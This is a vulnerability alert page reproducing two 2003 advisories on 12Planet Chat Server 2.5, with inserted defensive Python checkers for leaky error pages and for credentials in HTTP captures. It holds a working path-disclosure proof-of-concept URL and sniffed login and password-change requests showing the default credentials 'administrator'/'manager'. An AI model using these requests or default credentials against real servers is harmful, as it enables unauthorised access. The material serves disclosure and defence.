Category:   Application (Instant Messaging/IRC/Chat)  >   Chat Server (12Planet) Vendors:   12Planet
12Planet Chat Server Sends Administrative Password Over the Network in Clear Text
SecurityTracker Alert ID:  1006554
SecurityTracker URL:  http://securitytracker.com/id/1006554
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 11 2003
Impact:   Disclosure of authentication information, Disclosure of system information, User access via network
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.5
Description:   Dennis Rand at Infowarfare.dk reported two vulnerabilities in the 12Planet Chat Server. A remote user sniffing the network can obtain the administrative password. A remote user can also determine the installation path.

It is reported that the server's login page sends the password to the server in clear text without encryption. This also occurs when a user enters expert mode and changes the administrative password.

A remote user can determine the installation directory with the following type of URL:

http://[target]:8080/qwe/qwe/qwe/index.html

Impact:   A remote user with the ability to sniff the network between the administrator and the server can determine the administrator's password.

A remote user can determine the installation path.

Solution:   No vendor solution was available at the time of this entry. The vendor has reportedly suggested that customers use an SSL proxy (such as the Apache proxy) to protect administrator login credentials.
Vendor URL:  www.12planet.com/en/software/chat/index.html (Links to External Site)
Cause:   Access control error, Exception handling error
Underlying OS:   Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Date:  Fri, 11 Apr 2003 13:21:29 +0200
Subject:  Root directory revealing vulnerability Found in 12Planet Chat Server




                     Root directory revealing vulnerability
                       Found in 12Planet Chat Server 2.5
                           http://www.12planet.com

                           Discovered by Dennis Rand
                              www.Infowarfare.dk
------------------------------------------------------------------------

-----[SUMMARY
12Planet Chat Server provides advanced chat functionalities aiming to
offer discussion space for customers, partners and visitors.
It addresses the demand from all web sites and intranet/extranet
portals willing to offer "sticky" services to their visitors as well
as secure and reliable real-time communication to their customers.
Its moderation option enables businesses to organize online chat
conferences by inviting celebrities, experts to talk with visitors and
moderate visitor questions through a moderation process.

It is possible to get the Root directory revealed by sending
a specific URL request.

-----[AFFECTED SYSTEMS
Vulnerable systems:
  *  12Planet Chat Server 2.5

Immune systems:
  *

-----[SEVERITY
Low - An attacker has the possibility to find the location on the server
       on where the Chat Server is installed.


-----[DESCRIPTION OF WHAT THE VULNERABILITY IS

The following transcript demonstrates a sample exploitation of the
vulnerabilities:
-------------------------------------------------------------------
Anything less than 3 times /qwe and you will only get an
HTTP 500 - Internal server error

Proof-Of-Concept exploit:
[Input in browser]
http://vuln-host:8080/qwe/qwe/qwe/index.html

[Output]
Error: 500
Internal Servlet Error:

java.io.IOException: bad path: C:\Program Files\12Planet Chat Server v2.5.1\www\qwe\qwe\qwe\index.html
	at java/io/File.canonPath
	at java/io/File.getCanonicalPath
	at com/sun/web/core/DefaultServlet.doGet
	at javax/servlet/http/HttpServlet.service
	at javax/servlet/http/HttpServlet.service
	at com/sun/web/core/ServletWrapper.handleRequest
	at com/sun/web/core/Context.handleRequest
	at com/sun/web/server/ConnectionHandler.run


--------------------------------------------------------------------
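The transcript above shows the defect from the defender's side: the 500 page carries the exception class, the absolute installation path and a stack trace. The following Python script is an added example (not code from the advisory author or from 12Planet) of the check a QA or DAST job can run over error responses to catch this class of disclosure before deployment. The error bodies it scans are constructed inline: one shaped like the response quoted above (with the wrapped path joined onto one line), and one generic error page of the kind a hardened server should return instead; the reference id in the generic page is a placeholder.

```python
import re

# Constructed sample: an error body shaped like the 500 response quoted in the
# advisory (the wrapped path joined onto one line). Not captured from a live host.
LEAKY_ERROR_BODY = (
    "Error: 500\n"
    "Internal Servlet Error:\n"
    "\n"
    "java.io.IOException: bad path: C:\\Program Files\\12Planet Chat Server "
    "v2.5.1\\www\\qwe\\qwe\\qwe\\index.html\n"
    "\tat java/io/File.canonPath\n"
    "\tat java/io/File.getCanonicalPath\n"
    "\tat com/sun/web/core/DefaultServlet.doGet\n"
)

# Constructed sample of what a hardened server should return instead: a generic
# page with an opaque reference id (placeholder) that staff correlate server-side.
GENERIC_ERROR_BODY = (
    "<html><body><h1>500 Internal Server Error</h1>"
    "<p>Reference: ERR-PLACEHOLDER-0001</p></body></html>\n"
)

# Absolute Windows path (drive letter, colon, backslash) up to end of line or a
# character that cannot appear in a path.
WINDOWS_PATH = re.compile(r'[A-Za-z]:\\[^\r\n"<>|*?]+')
# Absolute POSIX path rooted in a well-known top-level directory.
POSIX_PATH = re.compile(r"/(?:usr|opt|home|var|srv|etc|tmp)/[^\s\"<>]+")
# Fully-qualified Java exception or error class name, e.g. java.io.IOException.
JAVA_EXCEPTION = re.compile(r"\b(?:[a-z]\w*\.)+[A-Z]\w*(?:Exception|Error)\b")
# One stack frame per line, in either the 'at a.b.C.m' or 'at a/b/C.m' spelling.
STACK_FRAME = re.compile(r"^\s*at\s+[\w$/.]+\.\w+\s*$", re.MULTILINE)


def find_leaked_paths(body: str) -> list:
    """Return absolute filesystem paths found in a response body."""
    return WINDOWS_PATH.findall(body) + POSIX_PATH.findall(body)


def find_exception_classes(body: str) -> list:
    """Return fully-qualified Java exception classes named in the body."""
    return sorted(set(JAVA_EXCEPTION.findall(body)))


def count_stack_frames(body: str) -> int:
    """Return the number of stack-trace frame lines in the body."""
    return len(STACK_FRAME.findall(body))


def assess_error_response(status: int, body: str) -> dict:
    """Summarise what an error response reveals about the server's internals.

    'leaks_internals' is True when the body exposes a filesystem path, an
    exception class or a stack trace, regardless of the HTTP status code.
    """
    paths = find_leaked_paths(body)
    exceptions = find_exception_classes(body)
    frames = count_stack_frames(body)
    return {
        "status": status,
        "paths": paths,
        "exceptions": exceptions,
        "stack_frames": frames,
        "leaks_internals": bool(paths or exceptions or frames),
    }


if __name__ == "__main__":
    for label, body in (("leaky", LEAKY_ERROR_BODY), ("generic", GENERIC_ERROR_BODY)):
        result = assess_error_response(500, body)
        print(label, result["leaks_internals"], result["paths"])
```

The check deliberately ignores the status code: a 500 by itself is not a finding, but any response (including a 200) that names a path, an exception class or a stack frame is. The matching mitigation is a catch-all error handler that logs the exception with a reference id on the server and sends the client only the generic page.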

-----[DETECTION
12Planet Chat Server 2.5 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.


-----[VENDOR RESPONSE
Thank you for the bug report. We are currently analyzing the issues and
will keep you updated on the progress. 12Planet will provide assistance
to all the customers that are interested in the patch
(email to : support@12planet.com)
Best regards, Lei
12Planet

-----[DISCLOSURE TIMELINE
21/02/2003 Found the Vulnerability.
21/02/2003 Reported to iDEFENSE
31/03/2003 Received rejection from iDEFENSE
01/04/2003 Reported to 12Planet (support@12planet.com; bugs@12planet.com;
sales@12planet.com; features@12planet.com)
01/04/2003 Received response from 12Planet
11/04/2003 Public Disclosure.


-----[ADDITIONAL INFORMATION
The vulnerability was discovered by <der@infowarfare.dk> Dennis Rand

-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.


-----

                       Clear text password vulnerability
                       found in 12Planet Chat Server 2.5
                           http://www.12planet.com

                           Discovered by Dennis Rand
                              www.Infowarfare.dk
------------------------------------------------------------------------

-----[SUMMARY
12Planet Chat Server provides advanced chat functionalities aiming to
offer discussion space for customers, partners and visitors.
It addresses the demand from all web sites and intranet/extranet
portals willing to offer "sticky" services to their visitors as well
as secure and reliable real-time communication to their customers.
Its moderation option enables businesses to organize online chat
conferences by inviting celebrities, experts to talk with visitors and
moderate visitor questions through a moderation process.

When starting the Administration site of the Chat Server the login
and password are sent over the net in clear text.

-----[AFFECTED SYSTEMS
Vulnerable systems:
  *  12Planet Chat Server 2.5

Immune systems:
  *

-----[SEVERITY
Low/Medium - An attacker is able to put a network sniffer on the
              network and sniff the username and password, because
              they are sent in clear text form.



-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
When sending the Administrator password on the login page
the password is sent in clear text.
The same problem exists when you enter expert mode to change
the administrator password: it will again be sent in clear text.

The following transcript demonstrates a sample exploitation of the
vulnerabilities:
-------------------------------------------------------------------
[Used Ethereal to sniff the traffic between the host and server]

LOGIN PAGE:
Here is the capture of the first line of defense from the 12Planet
Chat server:
---------------------------- CUT HERE ----------------------------------------
POST /servlet/one2planet.infolet.InfoServlet HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://193.88.206.253:8080/servlet/one2planet.infolet.InfoServlet?page=one2planet.community.core.PHLogin&technology=html&domain=default&language=english&url=%40HTTP%3A%2F%2F193.88.206.253%3A8080%2Fservlet%2Fone2planet.infolet.InfoServlet%3Fpage%3Done2planet.tools.PSDynPage%21template%3D%2F12p_template%2Fwww%2Fapps%2Fchatserver%2Fwizard%2Findex.html
Accept-Language: da
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 193.88.206.253:8080
Content-Length: 292
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SESSIONID=To1010mC7187873103878648At

page=one2planet.community.core.PHLogin&table=user&url=@HTTP%3A%2F%2F<vuln-host-ip>%3A8080%2Fservlet%2Fone2planet.infolet.InfoServlet%3Fpage%3Done2planet.tools.PSDynPage%21template%3D%2F12p_template%2Fwww%2Fapps%2Fchatserver%2Fwizard%2Findex.html&vserver=&username=administrator&passwd=manager
---------------------------- CUT HERE ----------------------------------------

ADMINISTRATION PAGE
Now if the administrator wants to change the password from the default one,
he or she enters the expert mode, from within which it is possible to change
the password, but again the password is sent in clear text.
---------------------------- CUT HERE ----------------------------------------
page=one2planet.community.core.PHChangePassword&nickname=administrator&psswd0=manager&psswd1=Trustno1@&psswd2=Trustno1@&submit3=OK
HTTP/1.0 200 OK
---------------------------- CUT HERE ----------------------------------------

--------------------------------------------------------------------
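Both captures above show the same failure: a form field holding a password travels inside a plain HTTP POST, so anyone who can read the segment sees it, and the session cookie rides along with it. The following Python script is an added example (not code from the advisory author or from 12Planet) of a capture-review check that parses a raw request, names the secret-bearing fields and session cookies without ever reporting their values, and decides whether the transport exposed them. The two requests it audits are constructed inline after the login and password-change POSTs quoted above; the hostname, cookie value and reduced header set are placeholders, not data from a live host. The `over_tls` flag models the HTTPS proxy in front of the administration console that the vendor recommends as a workaround.

```python
import re
from urllib.parse import parse_qs

# Constructed captures shaped like the two POST requests quoted in the advisory.
# Hostname and cookie value are placeholders, not from a live host.
LOGIN_CAPTURE = (
    "POST /servlet/one2planet.infolet.InfoServlet HTTP/1.1\r\n"
    "Host: chat.example.invalid:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: SESSIONID=constructed-session-token\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    "page=one2planet.community.core.PHLogin&table=user&vserver="
    "&username=administrator&passwd=manager"
)

CHANGE_PASSWORD_CAPTURE = (
    "POST /servlet/one2planet.infolet.InfoServlet HTTP/1.1\r\n"
    "Host: chat.example.invalid:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: SESSIONID=constructed-session-token\r\n"
    "\r\n"
    "page=one2planet.community.core.PHChangePassword&nickname=administrator"
    "&psswd0=manager&psswd1=Trustno1@&psswd2=Trustno1@&submit3=OK"
)

# Form field names that usually carry a secret; matched case-insensitively.
SECRET_FIELD = re.compile(r"pass|pwd|psswd|secret|token", re.IGNORECASE)
# Cookie names that usually carry a session identifier.
SESSION_COOKIE = re.compile(r"sess|sid|auth|token", re.IGNORECASE)


def parse_http_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, headers, body).

    Header names are lower-cased; the body is returned verbatim.
    """
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def credential_fields(headers: dict, body: str) -> list:
    """Return form field names in the body that look like secrets."""
    if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return []
    fields = parse_qs(body, keep_blank_values=True)
    return [name for name in fields if SECRET_FIELD.search(name)]


def session_cookies(headers: dict) -> list:
    """Return cookie names from the Cookie header that look like session ids."""
    names = []
    for part in headers.get("cookie", "").split(";"):
        name = part.strip().partition("=")[0]
        if name and SESSION_COOKIE.search(name):
            names.append(name)
    return names


def audit_capture(raw: str, over_tls: bool) -> dict:
    """Report which secrets a captured request carries and whether the
    transport exposed them. Secret values are never included in the report."""
    method, path, headers, body = parse_http_request(raw)
    creds = credential_fields(headers, body)
    cookies = session_cookies(headers)
    return {
        "method": method,
        "path": path,
        "credential_fields": creds,
        "session_cookies": cookies,
        # Plain HTTP exposes the secrets to anyone on the path; behind the
        # HTTPS proxy the vendor recommends, the same request is encrypted.
        "exposed": (not over_tls) and bool(creds or cookies),
    }


if __name__ == "__main__":
    for raw in (LOGIN_CAPTURE, CHANGE_PASSWORD_CAPTURE):
        report = audit_capture(raw, over_tls=False)
        state = "exposed" if report["exposed"] else "protected"
        print(report["path"], report["credential_fields"], report["session_cookies"], state)
```

Reporting field names rather than values keeps the audit output itself from becoming a second copy of the credential. Note what the TLS case does and does not fix: with the proxy in place the password is no longer readable on the wire, but it is still the default `manager` until changed, so the transport fix and a password change belong together.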

-----[DETECTION
12Planet Chat Server 2.5 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.

-----[WORK AROUNDS
As the vendor writes, they recommend their customers add
an HTTPS layer (through the Apache Proxy feature, for example) to the
administration console for the deployment of production servers.


-----[VENDOR RESPONSE
Thank you for the bug report. We are currently analyzing the issues and
will keep you updated on the progress. We recommend our customers to add
a HTTPS layer (through Apache Proxy feature for example) to the
administration console for the deployment of production servers, this to
solve the second issue you listed. 12Planet will provide assistance to
all the customers that are interested in the patch (email to :
support@12planet.com)
Best regards, Lei
12Planet



-----[DISCLOSURE TIMELINE
24/02/2003 Found the Vulnerability.
25/02/2003 Reported to iDEFENSE
31/03/2003 Received rejection from iDEFENSE
01/04/2003 Reported to 12Planet (support@12planet.com; bugs@12planet.com;
sales@12planet.com; features@12planet.com)
01/04/2003 Received response from 12Planet
11/04/2003 Public Disclosure.


-----[ADDITIONAL INFORMATION
The vulnerability was discovered by <der@infowarfare.dk> Dennis Rand

-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.


 
 


Copyright 2012, SecurityGlobal.net LLC